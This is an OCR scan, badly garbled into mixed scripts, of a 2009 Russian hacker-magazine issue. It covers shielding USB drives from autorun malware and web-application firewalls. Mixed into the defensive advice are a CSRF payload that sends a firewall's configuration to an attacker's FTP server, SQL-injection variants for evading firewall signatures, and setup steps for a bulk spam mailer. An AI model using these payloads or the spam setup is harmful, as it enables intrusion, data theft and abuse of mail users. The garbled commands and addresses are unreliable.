Группы иди подьзова(ге/м 




Полный доступ 


□ 


□ 


Изменить 


□ 


□ 


Чтение и выполнение 


Е 


□ 


Спиоок садержимогэ папки 


В 


□ 


Чтение 


В 


□ 


Запись 


□ 


т 






Чтобы аааеть особь» разрешений иш 
параметры, наонмите эту кнопку 



Дооолнигедьно 



ОК 



[ Отмена | [ применить | 



Устанавливаем права доступа на корень. Но если ты сидишь 
под рутом, толку от этого немного 

некорректными для ЕАТ32 имена ми! Именно этот принцип 
защиты лежит в основе программы 1)5В ОізкБесигіІу [ ѵѵѵѵѵѵ. 
гЬзЬагеѵуаге.сот ). которая создает на флешке АСТО ВО N. 
ІМЕ и в нем файл «гЬепдЬо.» (да-да, сточкой на конце — что, 
естественно, некорректно). И знаешь: большинство малва- 
ри остается не удел. За свое «ноу-хау» разработчики просят 
$50, но нам ничего не стоит сделать то же самое вручную. 
Для этого вспоминаем старыйтрикиз нашей давней статьи 
«Обход ограничений ЕАТ32/МТЕ5» [ Ыі:р://\л/ѵѵѵѵ.хакер. 
ги/тада2Іпе/хА/062/080/5.а5р ]. 
заключающийся в использовании 
локальных иМС-путей. Напомню, 
что ОМС — это формат для записи 
пути к файлу, расположенному на 
удаленном компьютере. Он имеет 
вид \ \зегѵег\з]таге\раС]т, где 
зегѵег — это название удален- 
ного хоста. Такой способ доступа 
кфайлам можно использовать и 
для локальной машины, — только 
тогда вместо зегѵег нужно под- 
ставлять «?» или «.», а путь к файлу 




> ІП^О 

• Отформатировав 
флешку в ІМТЕ5, 
будь готов немного 
потерять в произво- 
дительности. Тут 
приходится выби- 
рать: максимальное 
быстродействие 
или безопасность. 

• Винда по умол- 
чанию прячет 
настройки безо- 
пасности ІМТЕ5, 
скрывая папку 
«Безопасность» 

в свойствах папки. 
Чтобы включить 
ее отображение, 
необходимо 
в проводнике вы- 
брать: «Сервис 
Свойства папки 
Вид» и снять галку 
с опции «Использо- 
вать простой общий 
доступ кфайлам». 



Одна из лучших утилит для сканирования 
флешекна вирусы 
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рс_гопе 




> СІѴСІ 

Статью «Обход ог- 
раничений РАТ32/ 
МТР5» ищи на нашем 
диске. 




> ѵѵагпіпд 

Работать в системе с 

правами Админист- 
ратора — последнее 
дело, но, увы, распро- 
страненная практика. 
Если малварь будет 
запущена из-под 
такого аккаунта, то 
никакие наши меры 
не подействуют. 
Ррамотный вирус 
беспрепятственно 
вернет все на свои 
места и не поперхнет- 
ся. Мораль: не сиди 
под рутом! 



указывать вместе с буквой диска. Например, так: \\ ?\С : \ 
бо1(іег\Рі1е . СхС. Фишка втом, что при использовании 
НМС-путей и стандартных консольных команд можно со- 
здавать файлы даже сзапрещенными файловой системой 
именами. Создадим несложный ВАТ-файл со следующим 
содержанием: 

тксііг " \ \?\Д: \АиТОКиЫ . ІЫР\ЬРТЗ " 

Послезапуска получим каталоге некорректным именем 
ЕРТЗ, находящийся в папке АСІТОРСМ.ІМР — обычным 
способом ее уже неудалить, а значит, малварь не сможет 
создать файл аиФгип.іпС оставшись неудел! 

Недостатков хватает и у этого способа. Во-первых, разработ- 
чики новой мал вари могут использовать хинт от обратного и 
воспользоваться НМС-путями дляудаления файлов/папок 
с некорректным именем: \ \?\^: ХАИТОкиы. ІЫР\ЬРТЗ. 
Директорию можно вообще не удалять — а беспрепятственно 
переименовать: кпримеру, в АІЯОРиМ.ІМРІ. Другой вопрос, 
что такой малвари пока, опять же, немного. И раз мы заго- 
ворили о создании ВАТ-файла,то накидаемуниверсальный 
скриптик, который, помимо всего прочего, будет: 

• удалять папку, замаскированную под корзину (на флешке 
ее быть не должно), где располагаютсвои тела многие 
черви (втом числе, Воѵѵпасіир), а также папку с файлами 
восстановления системы; 

• создаватьсистемную папку АІЯОВНМ.ІМРсдиректориейСОМІ ; 

• с удалением такого файла будуттрудности даже под МТР5; 

• удалять и защищать сіезкіор.іпі, который также часто 
используется малварью. 

геЗ /з /д %~(30\гесус1е(і 
геЗ /з /д %~(30\гесус1ег 

геЗ /з /д «%~(30\3уз1:ет Ѵоіите ІпРогтаСіоп" 

(Зеі /Р /д %~(30\аиСогип. * 

ткеЗіг " \\?\%~(30\аикогип. іпР\сот1" 

аСкгіЬ +3 +І 1 %~(30\аикогип. іпР 

(Зеі /1 /д %~(30\(3езк1:ор . іпі 
тк(3.іг " \ \ ? \%~(3.0\(3.езкСор . іпі\сот1 " 
аккгіЬ +3 +І 1 %~(3.0\(3.езккор . іпі 




Пишем служебн ый ВАТ-файл для создания файла с некорН 
ректным именемі 

пару полезныхутилит. 

Начнем с первого. Казалосьбы: что может быть проще, чем 
отключение автозапуска? Но наделе все нетакпрозрачно! 
Даже если поставить запретчерез локальные политики 



Правим права 
доступа 
в консоли 



Установить ручками права доступа для одной флешки 
— легко. Для двух-трех — тоже ничего сложного. 

Но если требуется вакцинировать сразу десяток, 
скажем, для всех сотрудников предприятия? В этом 
случае нелишним будет автоматизировать про- 
цесс, устанавливая АСЬ-правила для флешки через 
командную строку. Кстати говоря, используемая для 
этого консольная утилита сасіз (СЬап^е Ассезз Сопггоі 
Ьізгз) — единственный способ настроить параметры 
безопасности в ѴѴіпсіоѵѵз ХР Ноте Есіігіоп. 

Первым делом нужно получить текущую АСЬ-таблицу 
с флешки. Допустим, она определяется в системе как 
дискХ: — команда для просмотра таблицы будет: 



Достаточно сохранить это на флешке с именем, например, 
аиФгип.ЬаІ; и запустить. 

Н СОВЛАДАТЬ С АВТОЗАГРУЗКОЙ 

Одно дело — разобраться со своей собственной флешкой, и 
совсем другое — не подцепитьзаразу с чужих. Для того что- 
бы малварь не перекочевала на твой комп, продолжив свое 
победоносное шествие, необходимо, во-первых, грамотно 
отключить автозагрузку, и, во-вторых, взять на вооружение 




сасіз X : \ 

В большинстве случаев вернется строка: 

X: \ Все: (01) (СІ) Р 

Символ Р (от слова РпП) в конце означает полный 
доступ для всего содержимого, — о чем говорят флаги 
(01) (СІ) . Нам нужно удалить права на изменение 
файлов, поэтому по очереди удаляем записи из табли- 
цы. В нашем примере надо удалить запись о полном 
доступе для группы «Все»: 

сасіз Х:\ /Е /К Все 

После чего разрешаем доступ к каталогу в режиме 
чтения (Кеаб опіу) : 

сасіз Х:\ /О Все:В 

Попробуй теперь создать в корне флешки файл. Едва 
ли получится :) . 



► 032 
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|ѵіиниатюрнаяушлита поможет избавиться от случайного а втоз а пускіі 

ѴѴіпсІоѵѵз, в системе все равно остаются дырки, позволяющие заюзать 
малварь. Это легко проверить! Сначала отключаем автозапуск через 
стандартные политики ѴѴіпсІоѵѵз и убеждаемся, что автозапуск вроде как 
не работает. Атеперь проведем эксперимент, создав на флешке аиіогип. 
іпісо следующим содержанием: 

[аиСогип] 
ореп = саіс . ехе 
з]те11\0реп\Согптапсі=са1с . ехе 
зііе11\0реп\Ве:ЕаиІР = 1 
зііе11\Ехр1оге\Соттапсі=са1с . ехе 
зііе11\АиРор1ау\Согптапсі=са1с . ехе 

Во время монтирования девайса, действительно, ничего не запускается, 
но попробуем дважды щелкнуть по иконке носителя. Что мы видим? Вин- 
да открывает калькулятор! Думаю, не надо объяснять, что вместо него 
там могло оказаться, что угодно. Вместо этого приведу подробную инст- 
рукцию, как правильно и окончательно отключитьавтозапусксистемы: 

1 . Первым делом правим ключ реестра, который отвечаетза запуске СВ. Пе- 
реходим в ветку НКЕУ_10САІ_МАСНІМЕ\5уз1;епп\Сиггеп1:Соп1:го[5е1:\5егл/іс 
ез\Сс1гопп, находим параметр АиСоКип и устанавливаем его равным нулю. 

2. Далее переходим в раздел НКЕУ_Е0САЕ_МАСНІМЕ\50ЕТѴѴАВЕ\ 
МісгозоіДѴѴіпбоѵѵзѴСиггепіѴегзіопѴроІісіезѴЕхрІогег. Здесь создаем 
новый ключ ыоВгіѵеТуреАиСоКип типа бѵѵогб и задаем значение 
II в шестнадцатеричной системе. Для верности можно повторить те 
же действия в ветке НКЕУ_СиВРЕМТ_В5ЕВ, но они все равно будут 
игнорироваться. 

3. Другой интересный хинт заключается в редактировании ключа НКЕУ_ 
Е0САЕ_МАСНІМЕ\50ЕТѴѴАВЕ\Місго5отѴѴІпбоѵѵ5МТ\СиггепіѴег5Іоп\ 
ІпіЕіІеМарріпд\Аи1:огип.іпС которому нужно присвоить значение (типа 
ВЕ0_52) — @ЗУЗ :ВоезЫоСЕхізС- Так мы заставляем ѴѴіпбоѵѵз думать, 
что аиіогип.іпі' является конфигурационным файлом древних про- 
грамм, разработанных для ОС, более ранних чем ѴѴіпбоѵѵз 95! Не имея 

в распоряжении реестра, они использовали .ІМІ-файлы для хранения 
своей конфигурации. Создав подобный параметр, мы говорим, чтобы 
система никогда не использовала значения из файла аиІогип.іпТ а ис- 
кала альтернативные «настройки» по адресу НКЕУ_Е0САЕ_МАСН1МЕ\ 
ЗОЕТѴѴАПЕѴПоезМоіЕхізІ: (естественно, он не существует). Таким 
образом, аиіогип.іпі вообще игнорируется системой, что нам и нужно. 
Используемый в значении параметра символ й блокирует чтение файла 



.ІМІ, если запрашиваемые данные не найдены в системном реестре, а 
5У5 является псевдонимом для краткого обозначения раздела НКЕУ_ 
ЕОСАЕ_МАСН I N Е\5оПѵѵаге. 

4. Нелишним будет обновить параметры файлов, которые не должны 
автозапускаться, добавив туда маску * . *. В разделе НКЕУ_ЕОСАЕ_ 
МАСНІМЕ\50ЕТѴѴАВЕ\Місго5об:\ѴѴіпбоѵѵ5\Сиггеп1:Ѵег5Іоп\Ехр[огег\ 
АиІорІауНапбІегзѴСапсеІАиІорІа у\Еі[ез создаем строковой параметр 
типа ВЕ6_52 с названием*.*. 

5. В реестре Винды естьзамечательный раздел МоипіРоіпІз?, кото- 
рый обновляется, кактолько в компьютер вставляется НЭВ-носитель. 
Собственно, именно это и позволяет провернуть трюк, который я описал 
вначале. Бороться с подобным положением вещей можно. Сначала 
необходимо удалить все ключи моипСРоіпСз2, которыеты сможешь 
найти поиском в реестре, после чего перегрузиться. Далее находим 
НКЕУ_СиВВЕМТ_и5ЕВ\5об:ѵѵа ге\Місгозоб:\ѴѴіпбоѵѵз\Сиггеп1;Ѵегзіоп\ 
ЕхрІогег\Моип1:Роіп1:з2 и в политике доступа запрещаем редактирование 
ключа всем пользователям, включая админов. Не помешает и устано- 
вить монитор реестра, который следил бы за появлением новых ключей 
МоипСРоіпСз2 и блокировал к ним доступ. 

Только после этого можно бытьуверенным, что автозапуск в системе 
работать не будет. Кто бы мог подумать, что все так сложно? :) 

Н ПОЛЕЗНЫЕ ТУЛЗЫ 

В поиске и сопротивлении малвари хорошими помощниками могут 
стать несколько утилит. Я не буду здесь приводить обычные антивиру- 
сы, которые, само собой, с этой напастью борются и во многих случаях 

— довольноуспешно. Вместо этого рассмотрим несколько небольших, но 
очень полезныхутил ИТ. 

1. АиІоРипбиагсі ( і иІогип.зѵпіЬазКе.сопп/АиІоРипСиагсІ.рЬр ]. 
Миниатюрная, но очень расширяемаятулза позволит настроить правила 

— что должно происходить, когда подключается флешка или СВ. Можно, 
кпримеру, в моментмонтированиятутжезапускатьсканнер малвари. 
АиЬВипбиагб сама проверяет наличие аиЬгип.іпб атакже скрытых 
файлов, уведомляя о них юзера. 

2. РІазЬ Оиагсі ( ѵѵѵѵѵѵ.баѵізг.сопп ]. 

Эта утилита также следит за появлением в системе сменных накопите- 
лей. При обнаружении нового диска она предлагает, на выбор: 

• Удалить добавленные файлом Аиіогип.іпі' пункты контекстного меню 
диска; 

• Информировать пользователя о наличии на диске файла АиІогип.іпС 

• Удалить файл Аиіогип.іпб 

• Удалить все файлы АиЬгип.*; 

Удаляем во всех случаях Аиіогип.іпі и спим спокойно. 

3.1)5В ОізкБесигіІу ( ѵѵѵѵѵѵ.гЬзЬагеѵѵаге.сопп ]. Увы, платная утилита для 
защиты флешекотмалвари. По своему опыту могу сказать, что с виру- 
сами она справляется на раз-два. В качестве бесплатной альтернативы 
можно привести ЕІазЬ Візіпіесіог. 



Непробиваемая 

защита 

Самая лучшая защита на флешке — запрет записи на хардварном 
уровне. Некоторое время назад у многих флешек такой переключа- 
тель был по умолчанию, но сейчас производители отошли от этой 
практики. Зато почти на всех карточках Зесиге Ні§іі;а1 (5В) переклю- 
чатели по-прежнему есть. Поэтому могу предложить непробиваемый 
вариант: купи такую карточку и компактный картрвдер, и в случае 
малейшего подозрения ставь переключатель в положение «геаб опіу». 
К тому же, картридер еще наверняка тебе пригодится (чтобы помочь 
скинуть фотографии красивой девушке, которая в панике бегает по 
офису в поисках провода от фотоаппарата) . 
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[ - -]$ ипате -а 

Ііпс» рс гопе С ІІ эс к . швсііа . шИ; . ѳсіи 2.6.19.2-]с1опд 

ОТ 2007 І686 СМи/0Іі-^< 

Г 1 іЗэпд ОБІіаг каііііаск : Ь іізЬ_ге1еазе -а 
N 0 15В тосіиіез аге гаяягілЬТе. 



0ІЗІ: гіЬиСог 10 
Оезсгірііоп : 
Кеіеазе: 
Сосіепате: 



ОЬипІіи 
Шэип^и 7.04 
7.04 
Теіз^у 



Пгіопд СвИагкайІіаск : 1 $ іТсопТід 



І'/аг 

[Зй 

05Е1 
І СІОГ]^ 
■ СІОПС 



ВОПРЕКИ 



ореп /ргос/пеЬ/сІеѵ (Регтіззіоп 
]$ рз аих 

ІМЕМ Ѵ52 Р55 ТТУ 



г* ^ 



27653 0.0 1.8 



12576 2684 ? 

9088 4712 рИз/О 



[Обновленный софт на пропатченной системе, грамотно настроенный файр^ 

о безопас-| 



□ азличные ошибки и огрехи систем открываютзлоумыш- 

ленникам все новые разновидности атак. Даже если ставка 
сделана на безопасный код, специалисты в обязательном 
порядке прибегают ксистемам обнаружения вторжения (Ю5) или их 
предотвращения (ІР5]. При помощи базы сигнатур и правил те могут с 
большой долей вероятности обнаружить атаку. Интересно, что, сточки 
зрения таких инструментов, все атаки имеют различный приоритет. На- 
пример, в известной 105 Зпогі: градация производится потрем уровням: 
к первому относятся самые критичные и опасные вторжения, в то время 
как второй и третий — это лишь сигналы к действию в случае обнару- 
жения некой аномальной активности (например, появления подозри- 
тельныхзапросов в логах веб-демона). Критичность атаки — отнюдь не 
единственное характеризующее ее свойство. Скажем, на реализацию 
рабочей 501-инъекции злоумышленникутребуется от 1 5 минут до 3 ча- 
сов, а на эксплуатацию неизвестного ему сервиса — от8 часов. Налицо 
— временная метрика! Помимо этого, в информационной безопасности 
используются и другие параметры оценки уязвимости: 

• сложность доступа (Ассезз Сотріехйу); 

• возможность эксплуатации (ЕхрЬйаЬіІйу); 

• степень конфиденциальности информации о баге; 

• известностьеготехническихдеталей (Перогі: Сопббепсе). 

Разработан целый стандарт оценки уязвимостей СѴ55 [ уууууу.бгзСогд/ 
СѴ55 І. со второй версией которого я настоятельно рекомендую ознако- 
миться. Зачем я все это рассказал? Чтобы ты понимал, — стаким разно- 



образием атак крайне важно, чтобы защита была комплексной и отчасти 
универсальной. Она должна быть готова отразить (или хотя бы зафикси- 
ровать) атаки «нулевого дня», фактор действия которых ранее не изучен. 
Инструменты тут могут быть самые разные и в статье я приведу несколько 
примеров — из тех, что лично использовал в своей практике. 

В >ѴЕВ-ПРИЛ0ЖЕНИЯИИХЗАЩИТА 

Последний ежеквартальный отчет Х-Рогсе ( хЬгсе.ізз.пеІ: ). выпускаемый 
при поддержке ІВМ, лишний раз подтверждает то, что давно известно. 
Атаки на ѴѴЕВ-приложения по-прежнему доминируют и составляют 
более 50% всех зафиксированных инцидентов. Чему удивляться, если 
за разработку системы подчас берется человек, который по кускам соби- 
рает программы, воспользовавшись Ооодіе’ом? И речь не о домашних 
страницах, а порой о сайтах серьезных государственных ведомств. 
Халатное отношение кбезопасности приводит нетолько кдефейсу, 
краже конфиденциальной информации, но и полному проникновению в 
целевую систему. В двух словах (и даже целой статье) невозможно объяс- 
нить, как писать безопасный код, но одну рекомендацию я все-таки дам. 
Крайне важно организовывать разработку приложения в соответствии с 
такими стандартами, какѴѴеЬ Аррбсабоп Зесигііу ЕіІеСусІе или МісгозоІІ 
50 Е. Оба нацелены на то, чтобы сами программисты, не являясь спецами 
по безопасности, могли разрабатывать код без критических ошибок. 
Впрочем, ошибки остаются даже в оченьсерьезных приложениях 
— это факт. Чтобы снизить рискэксплуатации и обнаружения таких 
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Зеленый 501 — средство, предназначенное для защиты от 
501-инъекций. Полноценным ѴѴАР его назвать нельзя, но 
все-таки отнести кэтомутипу защитных механизмов вполне 
можно. В отличие от известного всем тосІ_5есигі1:у, который 
работает на основе проверки Ьир-запросов кѴѴЕВ-серверу, 
6гееп501 выступает в роли прокси-сервера, непосредст- 
венно анализирующего проходящие через него запросы. По 
сути, это Веѵегзе-ргоху, который обрабатывает все входя- 
щие на сервер 501-запросы, проверяет и анализирует их, и 
лишь после этого направляет в саму Му50П. Соответствен- 
но, после получения от СУБД ответа, данные отправляются 
ксделавшему запрос клиенту. Каждый запрос градируется 
по конкретной степени риска в зависимости от различных 
параметров: обращения к служебным таблицам, использо- 
вания внутри запроса комментариев, операций сравнения 
констант («1=1 ») или выражений, заведомо возвращающих 
значениеТППЕ, наличия команддля обнуления полей с 
паролем ит.д. Сгееп5СЕ позволяетопределить список 



(Цркд -і дгеепзд1-:Еѵ7_0 . 9 . 2_іЗ 86 . йеЬ 
# Внимательно отвечаем на вопросы установки 
ШаР із Рке пате оР Рке зегѵег изесЗ Со зРоге 
СгеепЗСВ сопРідигаРіоп сіЬ (МуЗОВ зегѵег) ? <-- 

ІосаІІіозР 

ШаР із Рке сіаРаЬазе пате Рог Рке СгеепЗСЬ 

сопРідигаРіоп? <-- дгеепйЬ 

ІДоиІсі уои Ііке Ро зеР ир Рке сіаРаЬазе апсі 

РаЫез аиРотаРісаІІу ? <-- Уез 

ШкаР із Рке изегпате оР Рке МуЗОЬ 

аскпіпізРгаРог? <-- гооР 

ЕпРег Рке МуЗСЬ аскпіпізРгаРог раззѵ70гсі <-- 
уоиг_гооР_зд1_раззкогй (пароль твоего тузді 
гооР-а) 

СопРігт Ркіз раззѵ70Г(і <-- уоиг_гооР_зд1_ 
раззкогй (пароль твоего тузді гооР-а) 

ШкаР із Рке СгеепЗСЬ сЗЬ изегпате? <-- дгееп 
ШкаР із Рке СгеепЗСЬ изег раззѵ/огк? <-- 
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Панельуправления ехіепзіоп’ами. В N5 Мападег просто появится новое дополнение 
со своими опциями для настройки 



дгеепздіраззѵ^огй (пароль для дгееп пользова- 
теля) 

Распространенная ошибка начинающихадминистраторов 
— выбрать в качестве «ОгеепЗОІ бЬ изегпаппе» руга. Делать та к 
не советую, особенно если учитывать возможность эксплу- 
атации консоли управления. После установки дгеепзрі-іѵѵ 
запустится на 3305 порту, в то время как сама база Му501 по 
умолчанию висит на 3306. Чтобы заставить всетвои проекты 
«чувствовать» новый сервис, необходимо указать в конфигура- 
ционныхфайлаххост 127.0.0.1 и портЗЗОб. Ничего сложного: 

$сіЬ_соппес1: = тузд1_соппесР ('127.0.0.1:3305' , 
'тузр1_изег' , ' тузд1_раззѵгогсі ' ) 

После этого все запросы будут проходить через прокси и 
анализироваться. Установка Ігопі-епб’а дгеепзді-сопзоіе не 
менее проста: 

сигі "ІіЦЦр: //дгеепзрі .пер/сіоѵтіоасі/дгеепзді- 
сопзо1е-0 . 4 . б . Саг . дг " > дгеепзді-сопзоіе- 
0.4.6. Саг . дг 

Раг - 2 ХѴІ дгеепзд1-сопзо1е-0 . 4 . 6 . Раг . дз & ссЗ 
дгеепзді-сопзоіе 

етасз сопРід.рІір # убедись, что все поля запол- 
нены правильно 
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ІОгЗесигіІу в действии. Все попытки хакера узнать ка кую-| 
либо системную информациюувенчались неудачей 

В СЕТЕВАЯ ОБОРОНА 

ВопроссѴѴЕВ’ом обсудили, теперьдавай рассмотрим более 
низкий уровень. На самом деле, средства защиты для ѴѴіпбоѵѵз 

— в большом дефиците. В основном, все крутится и вертится 
под Ыпих, а под Виндулишь появляются сыроватые порты 
известных сторонних решений. Однако есть одно инструмен- 
тальное средство от самой Місговоі"!:, о котором и пойдет речь, 
□упатіс ІР Резігісііопз Ехіепзіоп [МісгозоІРсопп І . 

В июне 2008 года МісгозоО: выпустила несколько продуктов, 
предназначенных для ІТ-администраторов, администрато- 
ров БД и разработчиков ѵѵеЬ-приложений. Ихзадачи были 

— блокирование атак путем вставки постороннего кода на 
языке 501 (501 ІщесОоп). Можно сказать, что ТЬе Вупатіс 
ІР РезІгісОопз Ехіепзіоп продолжает линейку этих про- 
дуктов. Решение нацелено на достаточно обширный круг 
контролируемых векторов атак и включает в себя обнару- 
жение и предотвращение 50 Е-и нъекций, Х55- нападений, 
а также □Во5-атак. 

Если входящий трафик попадает под заранее подготов- 
ленные шаблоны аномалий (5УМ-«дождь», запросы на 
ВМ5-рекурсию — итакдалее), модуль может предпринять 
меры и заблокировать ІР-адреса. При блокировке ІР-ад- 
ресов учитывается количество одновременныхзапросов 

— если НТТР-клиент делает слишком много запросов сразу, 
его адрес блокируется. Крометого, учитывается интенсив- 
ность запросов — блокируются адреса, с которых поступает 
больше определенного количества запросов за некоторый 
период времени. Похожую возможность предоставлял 
встроенный в N57 модуль ІРѵ4 а пб Потаіп Резігісбопз, но 
□упаппіс ІР Резігісбопз Ехіепзіоп намного более функциона- 
лен и поддерживает ІРѵб. 

Дистрибутив приложения можно взять с сайта Из.пеД 
бо\л/піоасІ5/беІаии.азрх?І:аЬіб^34&д-6&і^1825 . После 




> Ііпкз 

Достаточно обшир- 
ный список ѴѴАЕ 
можно найти здесь 
— оѵѵазр.огд/іпбех. 
рЬр/ѴѴеЬ Арріісаііоп 
Еігеѵуаіі . Среди них 
есть как бесплатные 
средства защиты, так 
и продукты, предна- 
значенные исключи- 
тельно для корпора- 
тивного сектора. 



Каталогдгеепзді-сопзоіе закинь куда-нибудь себе на сайти 
выстави на каталог 1:еппр[а1:ез_с права для чтения и записи: 
сЬтоб 777 1:еппр[а1:ез_с. В заключение хочется отметить два 
основных косяка этой приблуды: зависимость от платформы 
и поддержка только одной СУБД. 

РНР-Ю5 [ рЬр-ібз.огд ]. 

Этотдинамично развивающийся проект курирует сама 
Соодіе Сгоир. РНР-Ю5защищаетнетолько отодного вида 
атаки, но и отХ55, РЕІ, ЕЕІ. Что важно — у проекта отлажен 
механизм обновления базы с шаблонами зловредных 
запросов, который можно скачать с постоянного адреса зѵп. 
рЬр-іб5.ога/5ѴпЛгипк/[ІЬ/ІР5/беІаии Лиег.хті . Сказать по 
правде, проектмне нравится больше содержанием, чем 
функционалом. Его базы с сигнатурами я зачастую исполь- 
зую в своих решениях и пополняю ими правила 5пог1;/ппоб_ 
зесигбу. Описывать процесс установки не буду, так как все 
полностью аналогично 6гееп50Е. 



установки открываем N5 Мападеги в левом древовидном 
списке выбираем соответствующее расширение. Идем в 
Ебб Оупатіс Резігісбопз и настраиваем значение опций. 
РасширениеТЬе Оупатіс ІР Резігісбопз Ехіепзіоп пред- 
лагает несколько реакций на подозрительное поведение 
— например, модуль может отправлять заблокированному 
НТТР-клиенту ответ 403 или 404, либо разрыватьсоедине- 
ние. Все отклоняемые запросы можно заносить в специ- 
альный журнал. Причем, можно задать конкретные правила 
для отдельных ІР. Например, — изменить ответ сервера на 
запрос с заблокированного ІР, тем самым запутав злоумыш- 
ленника и выдав на его атаки абсолютно произвольные 
страницы. 

Н СНИФЕРЫ ФАЙЛОВОЙ СИСТЕМЫ 

Участвуя в соревнованиях (СарШгеТЬе Еіад) схакерской 
командой Р5Т/0НС, большую ставку я делал именно на 
файловый анализ системы. Смысл соревнования — за- 
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Предупреждения ІР5 после неудачных 501-іп]ес1:іоп 



щита сервера от нападений любыми способами, не противоречащими 
регламенту (отключить патчкорд и запереть сервер в сейф, естественно, 
нельзя). Роль файлового снифера состоитв непрерывном мониторинге 
любых изменений на всех разделах диска, с объявлением тревоги по 
заданным правилам. Представь, что кто-то проник на целевую систему в 
твое отсутствие и решил «натворить дел». Подобное средство позволит 
тебе отследить действия хакера от начала до конца. 

Рзру ( тѵиѵ.огдЛзрѵ І. Один из наиболее продвинутых проектов для мони- 
торинга за файлами на системе. Запускается традиционной для никсов 
командой «.Лзру» с указанием дополнительных параметров для поме- 
щения в лог. Так, «/.Ізру — Р 1 — □ 5, А — 0 ‘[,Т,], , б,:,р,Т зіге: ,5, абте: ,А 
/еіс/» позволит отследитьлюбые изменения, обращения или создание 
файлов в папке/еіс/. 



г КУРЬЕЗ: САМА ЗАЩИТА — ОШИБКА 

Часто случается так, что сами средства защиты имеют бреши. К примеру, 
Ргоі'епзеѴѴеЬ Арріісаііоп Рігеѵѵаіі [ агтогіодіс.сот/ргоі'епзе оѵегѵіеѵѵ. 
Мші) «болеет» межсайтовым скриптингом и С5РР из-за недоста- 
точной проверки подлинности НТТР-запросов. Кстати, девиз этой 
компании звучит примерно так: «Оеіепзезадаіпзі: аКОѴѴАЗРТор Теп 
ѵиІпегаЬШііез» — то есть, «защищаем от всех видов атак из известного 
рейтинга уязвимостей 0ѴѴА5Р» [ ѵѵѵѵѵѵ.оѵѵазр.огд ]. Тем не менее, само 
средство серьезно уязвимо. Например, воспользовавшись ба гой, атаку- 
ющий может«перелить» все конфигурационные файлы с настройками 
на собственный РТР/5СР, а логи закачать на свой зузЬд-сервер. Осу- 



ществить подобную подмену настроек можно с помощью следующего 
вредоносного С5РР-сценария: 

< ітд згс=1іЦЦрз: / /ТюзС/азах.ІіЦтІ ?1іозЦпате=}іозЦпате 
&даСеѵ7ау = 1 О .1.1. 1&сіпз = 10 .1.1. 1&зт1:р = 10 .1.1. 1&тах 
_згс_сопп=10 0&тах_згс_сопп_га1:е_пит=1 О 0&тах_згс_ 
сопп_гаСе_зес = 1 О&ЫаскІ і зС_ехр = 3 б О 0&Ті:р_ 
зегѵег = адрес_своего_РТР-сервера& ТСр_рогР = 2 1&ТРр_ 
1одіп=изег&ТРр_раззѵ^(і=раззѵ^ог(і&ТРр_гетоЦе_(1іг= / 
&гетоЦе_зиррогЦ_оп=оп&асЦіоп=сопТідигаЦіоп&сіо = заѵе> 

Чтобы получить ощутимый результат, придется дождаться следующего 
«добровольного» ребута системы админом, либо попробовать впарить 
ему сценарий на перезагрузку: 

<ітд згс=1іРРрз : / /ТюзС/азах. 1іРт1?асЦіоп=гезЦагР&(іо = 
соге> 

Схожие примеры можно перечислять десятками. 



ѴѴАР — не панацея 

Поверь, установив ѴѴАР, ты не обезопасишь себя от всех возможных 
атак. В зависимости от уровня профессионализма злоумышленни- 
ка, ѴѴАР станет твоим другом и напарником, либо же — абсолютно 
ненужной штукой, зря занимающей место в сервисах. Дело в том, 
что существует множество методов обхода ѴѴАР — так называемых 
«еѵа5Іоп»-техник, дурящих непродуманные сигнатурные шаблоны. 
Например, стандартных шаблонов «ПНІОН ЗЕЬЕСТ», «ОК 1 = 1», 
«ЕХЕС_ХР» часто не хватает для грамотной защиты, и хакер исполь- 
зует более хитрые методы эксплуатации с помощью дополнитель- 
ных кодировок, пробелов и подмен. Так, вместо традиционной «ОК 
1 = 1», можно использовать следующие вариации: 

ОР “ЕАЕА”=“ЕАЕА” (использование других параметров); 

ОР «ЕАЕА“=М“ЕАЕА” (использование символам, присваивающего 
заданному параметру тип пѵагсЬаг на стороне 5^^-сервера. В плане 
исполнения запроса это мало что меняет, но при детекте нападенрія 
на основе сигнатур — очень многое) ; 

ОР “ЕАЕА”=”ЕА”+“ЕА” (применение операций конкатенации); 

ОР “ЕАЕА” іп (“ЕАЕА”) (проверка вложенности). 



ХАКЕР 03 / 123 / 09 



► 037 





взлом 



» 



Базу Наск} 



ЛЕОНИД «ВОЮ» СТРОЙКОВДаНДРЕЙ «ЗКѴ02» комаров! 

I ВОт@МАіПкІГ/^^^^ИГІ^МАВОѴ@ІТОЕРЕЫСЕ.В 



ХАКЕРСКИЕ СЕКР ЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 



№1 



ІЗАДАЧА:! 



РАБОТОСПОСОБНУЮ ПРОГРАММУ РАССЫЛКИ ПИСЕМ 
РЕШЕНИЕ: 

В последнее время можно встретить огромное количество самых 
разнообразных спам-систем, начиная от примитивных РНР-скриптов с 
функцией таіШ и заканчивая функциональными инструментами напо- 
добие ОігесіМаіІег. Однако спам-фильтры не стоят на месте, и с каждым 
днем все сложнее доставить рассылку в ІпЬох. Но не будем унывать, есть 
еще пара тулз, способных облегчить нам жизнь. Одна из таких софтин 
— [1МВ0Х]0оШег, созданная на базе ВігесіМаіІег. Прежде чем приступить 
кнастройкеспамилки, перечислим ее основные возможности: 

• Высокая скорость рассылки (до 200000 писем в час) 

• Поддержка неограниченного количества шаблонов 

• Встроенный чекер валидности етаіі-баз 

• Открытый исходный код 

• Отсутствие привязок к серверу 

• Нетребовательность к ресурсам 



• Полностью автономная 
работа 

• Возможность отправки 
писем с аттачем 

• Возможность эмуля- 
ции почтовых клиентов 
«ОиРІоок» и «ТПе Ваб» 

• Поддержка Техб/НТМВ- 
формата в письмах 

Теперь приступим кустановке и 
конфигурированию системы (ес- 
тественно, для благих намерений, 
например, — оповестить друзей о предстоящем событии): 

1 . Сливаем архив сутилой с нашего ДВД. 

2. Покупаем сервер, способный выдержать исходящую рассылку (аккаун- 
ты на обычном хостинге, какправило, быстро прикрывают). 

3. Заливаем тулзу в каталог/сді-Ьіп. 

4 . На скрипт ІпЬох. сді ставим чмод 755, а на все каталоги (Ьд, ирЬасІ, зуз) — 777. 

5 . Конфигспамилки — файл сопЬд.М. Редактируем его по своемуусмот- 
рению (пример конфига ищи на ОѴО). 

6. Переваливаем файл сопЬд.ІхІ: на сервер. 





ЗАДАЧА: 



I ПРОСМОТРЕТЬ скрытый профиль 
ВКОНТАКТЕ В РЕЖИМЕ НЕВИДИМОСТИ 
РЕШЕНИЕ: 



Наверняка, ты не раз сталкивался с проблемой просмотра скрытых 
